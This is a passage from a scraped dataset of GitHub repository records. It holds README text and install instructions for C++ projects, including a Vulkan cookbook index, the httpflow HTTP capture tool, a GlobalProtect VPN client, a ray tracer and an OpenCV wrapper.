sets](./Library/Source%20Files/05%20Descriptor%20Sets/12%20Allocating%20descriptor%20sets.cpp)\n\n* [13 - Updating descriptor sets](./Library/Source%20Files/05%20Descriptor%20Sets/13%20Updating%20descriptor%20sets.cpp)\n\n* [14 - Binding descriptor sets](./Library/Source%20Files/05%20Descriptor%20Sets/14%20Binding%20descriptor%20sets.cpp)\n\n* [15 - Creating descriptors with a texture and a uniform buffer](./Library/Source%20Files/05%20Descriptor%20Sets/15%20Creating%20descriptors%20with%20a%20texture%20and%20a%20uniform%20buffer.cpp)\n\n* [16 - Freeing descriptor sets](./Library/Source%20Files/05%20Descriptor%20Sets/16%20Freeing%20descriptor%20sets.cpp)\n\n* [17 - Resetting a descriptor pool](./Library/Source%20Files/05%20Descriptor%20Sets/17%20Resetting%20a%20descriptor%20pool.cpp)\n\n* [18 - Destroying a descriptor pool](./Library/Source%20Files/05%20Descriptor%20Sets/18%20Destroying%20a%20descriptor%20pool.cpp)\n\n* [19 - Destroying a descriptor set layout](./Library/Source%20Files/05%20Descriptor%20Sets/19%20Destroying%20a%20descriptor%20set%20layout.cpp)\n\n* [20 - Destroying a sampler](./Library/Source%20Files/05%20Descriptor%20Sets/20%20Destroying%20a%20sampler.cpp)\n\n## [Chapter 06 - Render Passes and Framebuffers](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/)\n\n* [01 - Specifying attachments descriptions](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/01%20Specifying%20attachments%20descriptions.cpp)\n\n* [02 - Specifying subpass descriptions](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/02%20Specifying%20subpass%20descriptions.cpp)\n\n* [03 - Specifying dependencies between subpasses](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/03%20Specifying%20dependencies%20between%20subpasses.cpp)\n\n* [04 - Creating a render pass](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/04%20Creating%20a%20render%20pass.cpp)\n\n* [05 - Creating a framebuffer](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/05%20Creating%20a%20framebuffer.cpp)\n\n* [06 - Preparing a render pass for geometry rendering and postprocess subpasses](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/06%20Preparing%20a%20render%20pass%20for%20geometry%20rendering%20and%20postprocess%20subpasses.cpp)\n\n* [07 - Preparing a render pass and a framebuffer with color and depth attachments](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/07%20Preparing%20a%20render%20pass%20and%20a%20framebuffer%20with%20color%20and%20depth%20attachments.cpp)\n\n* [08 - Beginning a render pass](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/08%20Beginning%20a%20render%20pass.cpp)\n\n* [09 - Progressing to the next subpass](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/09%20Progressing%20to%20the%20next%20subpass.cpp)\n\n* [10 - Ending a render pass](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/10%20Ending%20a%20render%20pass.cpp)\n\n* [11 - Destroying a framebuffer](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/11%20Destroying%20a%20framebuffer.cpp)\n\n* [12 - Destroying a render pass](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/12%20Destroying%20a%20render%20pass.cpp)\n\n## [Chapter 08 - Graphics and Compute Pipelines](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/)\n\n* [01 - Creating a shader module](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/01%20Creating%20a%20shader%20module.cpp)\n\n* [02 - Specifying pipeline shader stages](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/02%20Specifying%20pipeline%20shader%20stages.cpp)\n\n* [03 - Specifying pipeline vertex input state](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/03%20Specifying%20pipeline%20vertex%20input%20state.cpp)\n\n* [04 - Specifying pipeline input assembly state](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/04%20Specifying%20pipeline%20input%20assembly%20state.cpp)\n\n* [05 - Specifying pipeline tessellation state](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/05%20Specifying%20pipeline%20tessellation%20state.cpp)\n\n* [06 - Specifying pipeline viewport and scissor test state](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/06%20Specifying%20pipeline%20viewport%20and%20scissor%20test%20state.cpp)\n\n* [07 - Specifying pipeline rasterization state](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/07%20Specifying%20pipeline%20rasterization%20state.cpp)\n\n* [08 - Specifying pipeline multisample state](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/08%20Specifying%20pipeline%20multisample%20state.cpp)\n\n* [09 - Specifying pipeline depth and stencil state](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/09%20Specifying%20pipeline%20depth%20and%20stencil%20state.cpp)\n\n* [10 - Specifying pipeline blend state](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/10%20Specifying%20pipeline%20blend%20state.cpp)\n\n* [11 - Specifying pipeline dynamic states](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/11%20Specifying%20pipeline%20dynamic%20states.cpp)\n\n* [12 - Creating a pipeline layout](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/12%20Creating%20a%20pipeline%20layout.cpp)\n\n* [13 - Specifying graphics pipeline creation parameters](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/13%20Specifying%20graphics%20pipeline%20creation%20parameters.cpp)\n\n* [14 - Creating a pipeline cache object](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/14%20Creating%20a%20pipeline%20cache%20object.cpp)\n\n* [15 - Retrieving data from a pipeline cache](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/15%20Retrieving%20data%20from%20a%20pipeline%20cache.cpp)\n\n* [16 - Merging multiple pipeline cache objects](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/16%20Merging%20multiple%20pipeline%20cache%20objects.cpp)\n\n* [17 - Creating graphics pipelines](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/17%20Creating%20graphics%20pipelines.cpp)\n\n* [18 - Creating a compute pipeline](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/18%20Creating%20a%20compute%20pipeline.cpp)\n\n* [19 - Binding a pipeline object](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/19%20Binding%20a%20pipeline%20object.cpp)\n\n* [20 - Creating a pipeline layout with a combined image sampler, a buffer and push constant ranges](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/20%20Creating%20a%20pipeline%20layout%20with%20a%20combined%20image%20sampler,%20a%20buffer%20and%20push%20constant%20ranges.cpp)\n\n* [21 - Creating a graphics pipeline with vertex and fragment shaders, depth test enabled, and with dynamic viewport and scissor tests](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/21%20Creating%20a%20graphics%20pipeline%20with%20vertex%20and%20fragment%20shaders,%20depth%20test%20enabled,%20and%20with%20dynamic%20viewport%20and%20scissor%20tests.cpp)\n\n* [22 - Creating multiple graphics pipelines on multiple threads](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/22%20Creating%20multiple%20graphics%20pipelines%20on%20multiple%20threads.cpp)\n\n* [23 - Destroying a pipeline](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/23%20Destroying%20a%20pipeline.cpp)\n\n* [24 - Destroying a pipeline cache](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/24%20Destroying%20a%20pipeline%20cache.cpp)\n\n* [25 - Destroying a pipeline layout](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/25%20Destroying%20a%20pipeline%20layout.cpp)\n\n* [26 - Destroying a shader module](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/26%20Destroying%20a%20shader%20module.cpp)\n\n## [Chapter 09 - Command Recording and Drawing](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/)\n\n* [01 - Clearing a color image](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/01%20Clearing%20a%20color%20image.cpp)\n\n* [02 - Clearing a depth-stencil image](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/02%20Clearing%20a%20depth-stencil%20image.cpp)\n\n* [03 - Clearing render pass attachments](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/03%20Clearing%20render%20pass%20attachments.cpp)\n\n* [04 - Binding vertex buffers](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/04%20Binding%20vertex%20buffers.cpp)\n\n* [05 - Binding an index buffer](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/05%20Binding%20an%20index%20buffer.cpp)\n\n* [06 - Providing data to shaders through push constants](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/06%20Providing%20data%20to%20shaders%20through%20push%20constants.cpp)\n\n* [07 - Setting viewport state dynamically](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/07%20Setting%20viewport%20state%20dynamically.cpp)\n\n* [08 - Setting scissor state dynamically](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/08%20Setting%20scissor%20state%20dynamically.cpp)\n\n* [09 - Setting line width state dynamically](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/09%20Setting%20line%20width%20state%20dynamically.cpp)\n\n* [10 - Setting depth bias state dynamically](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/10%20Setting%20depth%20bias%20state%20dynamically.cpp)\n\n* [11 - Setting blend constants state dynamically](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/11%20Setting%20blend%20constants%20state%20dynamically.cpp)\n\n* [12 - Drawing a geometry](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/12%20Drawing%20a%20geometry.cpp)\n\n* [13 - Drawing an indexed geometry](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/13%20Drawing%20an%20indexed%20geometry.cpp)\n\n* [14 - Dispatching compute work](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/14%20Dispatching%20compute%20work.cpp)\n\n* [15 - Executing secondary command buffer inside a primary command buffer](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/15%20Executing%20secondary%20command%20buffer%20inside%20a%20primary%20command%20buffer.cpp)\n\n* [16 - Recording a command buffer that draws a geometry with dynamic viewport and scissor states](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/16%20Recording%20a%20command%20buffer%20that%20draws%20a%20geometry%20with%20dynamic%20viewport%20and%20scissor%20states.cpp)\n\n* [17 - Recording command buffers on multiple threads](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/17%20Recording%20command%20buffers%20on%20multiple%20threads.cpp)\n\n* [18 - Preparing a single frame of animation](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/18%20Preparing%20a%20single%20frame%20of%20animation.cpp)\n\n* [19 - Increasing the performance through increasing the number of separately rendered frames](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/19%20Increasing%20the%20performance%20through%20increasing%20the%20number%20of%20separately%20rendered%20frames.cpp)\n\n## [Chapter 10 - Helper Recipes](./Library/Source%20Files/10%20Helper%20Recipes/)\n\n* [01 - Preparing a translation matrix](./Library/Source%20Files/10%20Helper%20Recipes/01%20Preparing%20a%20translation%20matrix.cpp)\n\n* [02 - Preparing a rotation matrix](./Library/Source%20Files/10%20Helper%20Recipes/02%20Preparing%20a%20rotation%20matrix.cpp)\n\n* [03 - Preparing a scaling matrix](./Library/Source%20Files/10%20Helper%20Recipes/03%20Preparing%20a%20scaling%20matrix.cpp)\n\n* [04 - Preparing a perspective projection matrix](./Library/Source%20Files/10%20Helper%20Recipes/04%20Preparing%20a%20perspective%20projection%20matrix.cpp)\n\n* [05 - Preparing an orthographic projection matrix](./Library/Source%20Files/10%20Helper%20Recipes/05%20Preparing%20an%20orthographic%20projection%20matrix.cpp)\n\n* [06 - Loading texture data from a file](./Library/Source%20Files/10%20Helper%20Recipes/06%20Loading%20texture%20data%20from%20a%20file.cpp)\n\n* [07 - Loading a 3D model from an OBJ file](./Library/Source%20Files/10%20Helper%20Recipes/07%20Loading%20a%203D%20model%20from%20an%20OBJ%20file.cpp)\n### Download a free PDF\n\n If you have already purchased a print or Kindle version of this book, you can get a DRM-free PDF version at no cost.
Simply click on the link to claim your free PDF.
\n

https://packt.link/free-ebook/9781786468154

", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "six-ddc/httpflow", "link": "https://github.com/six-ddc/httpflow", "tags": ["tcpdump", "capture", "http", "traffic-analysis", "pcap-files"], "stars": 646, "description": "A command line utility helps to capture and dump HTTP stream", "lang": "C++", "repo_lang": "", "readme": "# httpflow\n\n[![Build Status](https://travis-ci.org/six-ddc/httpflow.svg?branch=master)](https://travis-ci.org/six-ddc/httpflow)\n\n[![asciicast](https://asciinema.org/a/scdzwLDNytSPHtpbu1ECSv5FV.svg)](https://asciinema.org/a/scdzwLDNytSPHtpbu1ECSv5FV)\n\n## Installation\n\n### MacOs\n\n```bash\nbrew update\nbrew install httpflow\n```\n\n### Linux\n\n* Install [zlib](http://www.zlib.net/), [pcap](http://www.tcpdump.org/), [pcre](http://pcre.org/)\n\n```bash\n## On CentOS\nyum update\nyum install libpcap-devel zlib-devel pcre-devel\n\n## On Ubuntu / Debian\napt-get update\napt-get install libpcap-dev zlib1g-dev libpcre3 libpcre3-dev\n```\n\n* Building httpflow\n\n```bash\n> git clone https://github.com/six-ddc/httpflow\n> cd httpflow && make && make install\n```\n\nor directly download [Release](https://github.com/six-ddc/httpflow/releases) binary file.\n\n## Usage\n\n```\nlibpcap version libpcap version 1.9.1\nhttpflow version 0.0.9\n\nUsage: httpflow [-i interface | -r pcap-file] [-u url-filter] [-w output-path] [expression]\n\n -i interface Listen on interface, This is same as tcpdump 'interface'\n -r pcap-file Read packets from file (which was created by tcpdump with the -w option)\n Standard input is used if file is '-'\n -u url-filter Matches which urls will be dumped\n -w output-path Write the http request and response to a specific directory\n\n expression Selects which packets will be dumped, The format is the same as tcpdump's 'expression' argument\n If filter expression is given, only packets for which expression is 'true' will be dumped\n For the expression syntax, see pcap-filter(7)\n\n For more information, see https://github.com/six-ddc/httpflow\n```\n\n* Capture default interface\n\n```bash\n> httpflow\n```\n\n* Capture all interfaces\n\n```bash\n> httpflow -i any\n```\n\n* Use the expression to filter the capture results\n\n```bash\n# If no expression is given, all packets on the net will be dumped.\n# For the expression syntax, see pcap-filter(7).\n> httpflow host httpbin.org or host baidu.com\n```\n\n* Use the regexp to filter request urls\n\n```bash\n> httpflow -u '/user/[0-9]+'\n```\n\n* Read packets from pcap-file\n\n```bash\n# tcpdump -w a.cap\n> httpflow -r a.cap\n```\n\n* Read packets from input\n\n```bash\n> tcpdump -w - | httpflow -r -\n```\n\n* Write the HTTP request and response to directory `/tmp/http`\n\n```bash\n> httpflow -w /tmp/http\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cocos/engine-native", "link": "https://github.com/cocos/engine-native", "tags": ["cocos", "cocos2d", "game-engine", "game-development", "rendering", "3d", "vulkan", "metal", "ios"], "stars": 646, "description": "Native engine for Cocos Creator v2.x", "lang": "C++", "repo_lang": "", "readme": "Cocos native engine for Cocos Creator v2.x\n==========================\n\n\"Build\n\nIt is based on [cocos2d-x](https://github.com/cocos2d/cocos2d-x)[version 3.9], but remove 3D and other features. It works on iOS, Android, macOS and Windows.\n\n**For Cocos Creator v3.5+, native engine have been merged into [engine repository](https://github.com/cocos/cocos-engine)**\n\n------------------------------------------------\n\nThe major change:\n\n- Remove 3D features\n - Sprite3D\n - Skybox\n - Terrain\n - Light\n - Navmesh\n - Physics3D\n - BillBoard\n - Animate3D\n - Bundle3D\n - MeshSkin\n - etc..\n\n- Only support iOS, macOS, Android and Windows.\n- Remove support for LUA script\n- Remove deprecated classes and functions\n- Remove Camera\n- Remove Physics integration\n- Using FastTileMap instead of TileMap\n- Remove C++ implementations of CocoStudio parser\n- Remove C++ implementations of CocosBuilder parser\n- Remove AssetsManager, AssetsManagerEX\n- Remove Allocator\n- Remove AutoPolygon\n- Remove support for WebP, S3TC, ATITC\n- Remove support for game controller\n- Improved robustness and many bugs have been fixed\n\nGit user attention\n-----------------------\n\n1. Clone the repo from GitHub.\n\n $ git clone https://github.com/cocos-creator/engine-native.git\n $ cd engine-native\n $ npm install\n\n2. After cloning the repo, please execute `gulp init` to download and install dependencies.\n\n $ gulp init\n\n3. Build simulator\n\n $ gulp gen-simulator\n $ gulp update-simulator-config\n\n If you need to debug the simulator on macOS, you should sign the \"./simulator/mac/simulator.app\" by using `codesign` after build, or manually build the simulator project (\"./tools/simulator/frameworks/runtime-src/proj.ios_mac/simulator.xcodeproj\") in Xcode and enable Signing.\n ![](https://user-images.githubusercontent.com/1503156/32046986-3ab1f0b6-ba0a-11e7-9c7f-7fe0a385d338.png)\n\nContributing to the Project\n--------------------------------\n\nThe engine code is open sourced under the [License](https://github.com/cocos/cocos-engine/blob/develop/licenses/ENGINE_license.txt). We welcome participation!\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "wjakob/nori", "link": "https://github.com/wjakob/nori", "tags": [], "stars": 646, "description": "Nori: an educational ray tracer", "lang": "C++", "repo_lang": "", "readme": "[![CS440 Banner](https://rgl.s3.eu-central-1.amazonaws.com/media/uploads/wjakob/2017/02/16/cs440-logo_web.jpg)](https://rgl.s3.eu-central-1.amazonaws.com/media/uploads/wjakob/2017/02/20/cs440-rgl.jpg)\n\n## Nori Version 2\n![Build status](https://github.com/wjakob/nori/workflows/Build/badge.svg)\n\nNori is a simple ray tracer written in C++. It runs on Windows, Linux, and\nMac OS and provides basic functionality that is required to complete the\nassignments in the course Advanced Computer Graphics taught at EPFL.\n\n### Course information and framework documentation\n\nFor access to course information including slides and reading material, visit the main [Advanced Computer Graphics website](https://rgl.epfl.ch/courses/ACG17). The Nori 2 framework and coding assignments will be described on the [Nori website](https://wjakob.github.io/nori).\n\n### Note to researchers and students from other institutions\n\nLast year's version of Nori including a full set of assignment descriptions can\nbe found in the following [archive](https://github.com/wjakob/nori-old).\n\n\n### Known Issues\nThere is a known issue with the NanoGUI version that Nori uses: on Linux systems with an integrated Intel GPU, a bug in the Mesa graphics drivers causes the GUI to freeze on startup. A workaround is to temporarily switch to an older Mesa driver to run Nori. This can be done by running\n```\nexport MESA_LOADER_DRIVER_OVERRIDE=i965\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "yuezk/GlobalProtect-openconnect", "link": "https://github.com/yuezk/GlobalProtect-openconnect", "tags": ["openconnect", "gui", "qt5", "linux", "vpn", "globalprotect", "saml", "paloaltonetworks", "okta", "authentication", "azure"], "stars": 645, "description": "A GlobalProtect VPN client (GUI) for Linux, based on OpenConnect and built with Qt5, supports SAML auth mode.", "lang": "C++", "repo_lang": "", "readme": "# GlobalProtect-openconnect\nA GlobalProtect VPN client (GUI) for Linux based on Openconnect and built with Qt5, supports SAML auth mode, inspired by [gp-saml-gui](https://github.com/dlenski/gp-saml-gui).\n\n

\n \n

\n\n\"Buy\n\"Support\n\"Buy\n\n\n## Features\n\n- Similar user experience as the official client in macOS.\n- Supports both SAML and non-SAML authentication modes.\n- Supports automatically selecting the preferred gateway from the multiple gateways.\n- Supports switching gateway from the system tray menu manually.\n\n\n## Install\n\n|OS|Stable version | Development version|\n|---|--------------|--------------------|\n|Linux Mint, Ubuntu 18.04 or later|[ppa:yuezk/globalprotect-openconnect](https://launchpad.net/~yuezk/+archive/ubuntu/globalprotect-openconnect)|[ppa:yuezk/globalprotect-openconnect-snapshot](https://launchpad.net/~yuezk/+archive/ubuntu/globalprotect-openconnect-snapshot)|\n|Arch, Manjaro|[globalprotect-openconnect](https://archlinux.org/packages/community/x86_64/globalprotect-openconnect/)|[AUR: globalprotect-openconnect-git](https://aur.archlinux.org/packages/globalprotect-openconnect-git/)|\n|Fedora|[copr: yuezk/globalprotect-openconnect](https://copr.fedorainfracloud.org/coprs/yuezk/globalprotect-openconnect/)|[copr: yuezk/globalprotect-openconnect](https://copr.fedorainfracloud.org/coprs/yuezk/globalprotect-openconnect/)|\n|openSUSE, CentOS 8|[OBS: globalprotect-openconnect](https://build.opensuse.org/package/show/home:yuezk/globalprotect-openconnect)|[OBS: globalprotect-openconnect-snapshot](https://build.opensuse.org/package/show/home:yuezk/globalprotect-openconnect-snapshot)|\n\nAdd the repository in the above table and install it with your favorite package manager tool.\n\n[![Arch package](https://repology.org/badge/version-for-repo/arch/globalprotect-openconnect.svg)](https://repology.org/project/globalprotect-openconnect/versions)\n[![AUR package](https://repology.org/badge/version-for-repo/aur/globalprotect-openconnect.svg)](https://repology.org/project/globalprotect-openconnect/versions)\n[![Manjaro Stable package](https://repology.org/badge/version-for-repo/manjaro_stable/globalprotect-openconnect.svg)](https://repology.org/project/globalprotect-openconnect/versions)\n[![Manjaro Testing package](https://repology.org/badge/version-for-repo/manjaro_testing/globalprotect-openconnect.svg)](https://repology.org/project/globalprotect-openconnect/versions)\n[![Manjaro Unstable package](https://repology.org/badge/version-for-repo/manjaro_unstable/globalprotect-openconnect.svg)](https://repology.org/project/globalprotect-openconnect/versions)\n[![nixpkgs unstable package](https://repology.org/badge/version-for-repo/nix_unstable/globalprotect-openconnect.svg)](https://repology.org/project/globalprotect-openconnect/versions)\n[![Parabola package](https://repology.org/badge/version-for-repo/parabola/globalprotect-openconnect.svg)](https://repology.org/project/globalprotect-openconnect/versions)\n\n### Linux Mint, Ubuntu 18.04 or later\n\n```sh\nsudo add-apt-repository ppa:yuezk/globalprotect-openconnect\nsudo apt-get update\nsudo apt-get install globalprotect-openconnect\n```\n\n> For Linux Mint, you might need to import the GPG key with: `sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 7937C393082992E5D6E4A60453FC26B43838D761` if you encountered an error `gpg: keyserver receive failed: General error`.\n\n### Arch Linux / Manjaro\n\n```sh\nsudo pacman -S globalprotect-openconnect\n```\n\n### AUR snapshot version\n\n```sh\nyay -S globalprotect-openconnect-git\n```\n\n### Fedora\n\n```sh\nsudo dnf copr enable yuezk/globalprotect-openconnect\nsudo dnf install globalprotect-openconnect\n```\n\n### openSUSE\n\n- openSUSE Tumbleweed\n ```sh\n sudo zypper ar https://download.opensuse.org/repositories/home:/yuezk/openSUSE_Tumbleweed/home:yuezk.repo\n sudo zypper ref\n sudo zypper install globalprotect-openconnect\n ```\n\n- openSUSE Leap\n\n ```sh\n sudo zypper ar https://download.opensuse.org/repositories/home:/yuezk/openSUSE_Leap_15.2/home:yuezk.repo\n sudo zypper ref\n sudo zypper install globalprotect-openconnect\n ```\n### CentOS 8\n\n1. Add the repository: `https://download.opensuse.org/repositories/home:/yuezk/CentOS_8/home:yuezk.repo`\n1. Install `globalprotect-openconnect`\n\n\n## Build & Install from source code\n\nClone this repo with:\n\n```sh\ngit clone https://github.com/yuezk/GlobalProtect-openconnect.git\ncd GlobalProtect-openconnect\n```\n\n### MX Linux\nThe following instructions are for **MX-21.2.1_x64 KDE**.\n\n```sh\nsudo apt install qttools5-dev libsecret-1-dev libqt5keychain1\n./scripts/install-debian.sh\n```\n\n### Ubuntu/Mint\n\n> **\u26a0\ufe0f REQUIRED for Ubuntu 18.04 \u26a0\ufe0f**\n>\n> Add this [dwmw2/openconnect](https://launchpad.net/~dwmw2/+archive/ubuntu/openconnect) PPA first to install the latest openconnect.\n>\n> ```sh\n> sudo add-apt-repository ppa:dwmw2/openconnect\n> sudo apt-get update\n> ```\n\nBuild and install with:\n\n```sh\n./scripts/install-ubuntu.sh\n```\n### openSUSE\n\nBuild and install with:\n\n```sh\n./scripts/install-opensuse.sh\n```\n\n### Fedora\n\nBuild and install with:\n\n```sh\n./scripts/install-fedora.sh\n```\n\n### Other Linux\n\nInstall the Qt5 dependencies and OpenConnect:\n\n- QtCore\n- QtWebEngine\n- QtWebSockets\n- QtDBus\n- openconnect v8.x\n- qtkeychain\n\n...then build and install with:\n\n```sh\n./scripts/install.sh\n```\n\n\n### NixOS\n In `configuration.nix`:\n\n ```\n services.globalprotect = {\n enable = true;\n # if you need a Host Integrity Protection report\n csdWrapper = \"${pkgs.openconnect}/libexec/openconnect/hipreport.sh\";\n };\n\n environment.systemPackages = [ globalprotect-openconnect ];\n ```\n\n## Run\n\nOnce the software is installed, you can run `gpclient` to start the UI.\n\n## Passing the Custom Parameters to `OpenConnect` CLI\n\nSee [Configuration](https://github.com/yuezk/GlobalProtect-openconnect/wiki/Configuration)\n\n## Display the system tray icon on Gnome 40\n\nInstall the [AppIndicator and KStatusNotifierItem Support](https://extensions.gnome.org/extension/615/appindicator-support/) extension and you will see the system try icon (Restart the system after the installation).\n\n

\n \n

\n\n\n## Troubleshooting\n\nRun `gpclient` in the Terminal and collect the logs.\n\n## [License](./LICENSE)\nGPLv3\n", "readme_type": "markdown", "hn_comments": "Official openconnect client source is on gitlab btw: https://gitlab.com/openconnect/openconnectTo avoid this problem, once I know the name of the project, I research it to find the official site / project page and then follow their links to source.To answer your original question, security is very complex and it's not hard to hide backdoors or malicious functionality from the uninitiated. If you're not an appsec person by trade, it's probably safer to pay to have it professionally audited.That's usually cost prohibitive. You can try free SAST and DAST scanners for code (run in a VM or on a VPS for DAST scanning - VPS has the added benefit that if it's serious malware that includes VM escape, your system is still safe) as well as multiscanners like virustotal for compiled binaries, but do not assume that a lack of findings in those means a tool, project, or binary is safe.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kylemcdonald/ofxCv", "link": "https://github.com/kylemcdonald/ofxCv", "tags": ["openframeworks", "addon", "opencv", "wrapper", "computer-vision"], "stars": 645, "description": "Alternative approach to interfacing with OpenCv from openFrameworks.", "lang": "C++", "repo_lang": "", "readme": "# Introduction\n\nofxCv represents an alternative approach to wrapping OpenCV for openFrameworks.\n\n# Installation\n\nFirst, pick the branch that matches your version of openFrameworks:\n\n* OF [stable](https://github.com/openframeworks/openFrameworks/tree/stable) (0.9.8): use [ofxCv/stable](https://github.com/kylemcdonald/ofxCv/tree/stable)\n* OF [master](https://github.com/openframeworks/openFrameworks) (0.10.0): use [ofxCv/master](https://github.com/kylemcdonald/ofxCv/)\n\nEither clone out the source code using git:\n\n\t> cd openFrameworks/addons/\n\t> git clone https://github.com/kylemcdonald/ofxCv.git\n\nOr download the source from GitHub [here](https://github.com/kylemcdonald/ofxCv/archive/master.zip), unzip the folder, rename it from `ofxCv-master` to `ofxCv` and place it in your `openFrameworks/addons` folder.\n\nTo run the examples, import them into the project generator, create a new project, and open the project file in your IDE.\n\n# Goals\n\nofxCv has a few goals driving its development.\n\n### Wrap complex things in a helpful way\n\nSometimes this means: providing wrapper functions that require fewer arguments than the real CV functions, providing a smart interface that handles dynamic memory allocation to make things faster for you, or providing in place and out of place alternatives.\n\n### Present the power of OpenCv clearly\n\nThis means naming things in an intuitive way, and, more importantly, providing classes that have methods that transform the data represented by that class. It also means providing demos of CV functions, and generally being more useful than ofxOpenCv.\n\n### Interoperability of openFrameworks and OpenCv\n\nMaking it easy to work directly with CV by providing lightweight conversion functions, and providing wrappers for CV functions that do the conversions for you.\n\n### Elegant internal OpenCv code\n\nProvide clean implementations of all functions in order to provide a stepping stone to direct OpenCV use. This means using function names and variable names that follow the OpenCV documentation, and spending the time to learn proper CV usage so I can explain it clearly to others through code. Sometimes there will be heavy templating in order to make OF interoperable with OpenCV, but this should be avoided in favor of using straight OpenCV as often as possible.\n\n# Usage\n\nSometimes this readme will fall out of date. Please refer to the examples as the primary reference in that case.\n\n## Project setup\n\nUsing ofxCv requires:\n\n* ofxCv/libs/ofxCv/include/ Which contains all the ofxCv headers.\n* ofxCv/libs/ofxCv/src/ Which contains all the ofxCv source.\n* ofxCv/src/ Which ties together all of ofxCv into a single include.\n* opencv/include/ The OpenCv headers, located in addons/ofxOpenCv/\n* opencv/lib/ The precompiled static OpenCv libraries, located in addons/ofxOpenCv/\n\nYour linker will also need to know where the OpenCv headers are. In XCode this means modifying one line in Project.xconfig:\n\n\tHEADER_SEARCH_PATHS = $(OF_CORE_HEADERS) \"../../../addons/ofxOpenCv/libs/opencv/include/\" \"../../../addons/ofxCv/libs/ofxCv/include/\"\n\nAlternatively, I recommend using [OFXCodeMenu](https://github.com/openframeworks/OFXcodeMenu) to add ofxCv to your project.\n\n## Including ofxCv\n\nInside your ofApp.h you will need one include:\n\n\t#include \"ofxCv.h\"\n\nOpenCv uses the `cv` namespace, and ofxCv uses the `ofxCv` namespace. You can automatically import them by writing this in your `.cpp` files:\n\n\tusing namespace cv;\n\tusing namespace ofxCv;\n\nIf you look inside the ofxCv source, you'll find lots of cases of `ofxCv::` and `cv::`. In some rare cases, you'll need to write `cv::` in your code. For example, on OSX `Rect` and `Point` are defined by OpenCv, but also `MacTypes.h`. So if you're using an OpenCv `Rect` or `Point` you'll need to say so explicitly with `cv::Rect` or `cv::Point` to disambiguate.\n\nofxCv takes advantage of namespaces by using overloaded function names. This means that the ofxCv wrapper for `cv::Canny()` is also called `ofxCv::Canny()`. If you write simply `Canny()`, the correct function will be chosen based on the arguments you pass.\n\n## Working with ofxCv\n\nUnlike ofxOpenCv, ofxCv encourages you to use either native openFrameworks types or native OpenCv types, rather than introducing a third type like `ofxCvImage`. To work with OF and OpenCv types in a fluid way, ofxCv includes the 